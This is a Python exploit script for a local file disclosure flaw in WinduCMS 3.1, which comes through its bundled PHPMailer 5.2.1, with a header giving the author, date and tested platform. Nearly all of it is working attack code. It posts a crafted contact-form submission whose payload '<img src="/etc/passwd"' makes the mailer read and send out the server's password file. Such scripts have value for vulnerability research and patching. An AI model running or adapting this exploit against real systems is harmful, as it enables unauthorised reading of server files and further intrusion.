36 lines
No EOL
1.2 KiB
Python
Executable file
36 lines
No EOL
1.2 KiB
Python
Executable file
#!/usr/bin/python
|
|
#
|
|
# Exploit Title: WinduCMS <= 3.1 - Local File Disclosure
|
|
# Date: 2017-12-03
|
|
# Exploit Author: Maciek Krupa
|
|
# Vendor Homepage: http://windu.org
|
|
# Version: 3.1
|
|
# Tested on: Linux Debian 9
|
|
#
|
|
# // Description //
|
|
#
|
|
# Local File Disclosure vulnerability exists in WinduCMS through a vulnerable PHPMailer version 5.2.1 used here
|
|
#
|
|
# // PoC //
|
|
#
|
|
# It requires a contact form present on the website
|
|
#
|
|
# Example: {{W name=contactForm inputs="name" email="root@localhost"}}
|
|
#
|
|
|
|
from requests_toolbelt import MultipartEncoder
|
|
import requests
|
|
|
|
print("WinduCMS <= 3.1 Exploit")
|
|
|
|
url = 'http://localhost/contact_page?mn=contactform.message.negative'
|
|
email = 'attacker@example.com'
|
|
payload = '<img src="/etc/passwd"'
|
|
form_input = 'name'
|
|
fields = {'form_key': 'contactForm', form_input: 'Attacker', 'email': email, 'content': payload}
|
|
m = MultipartEncoder(fields=fields, boundary='----WebKitFormBoundary1500777958139315')
|
|
headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 'Content-Type': m.content_type}
|
|
print('Sending payload to target...')
|
|
r = requests.post(url, data=m.to_string(), headers=headers)
|
|
if r.status_code == 200:
|
|
print('Exploited.') |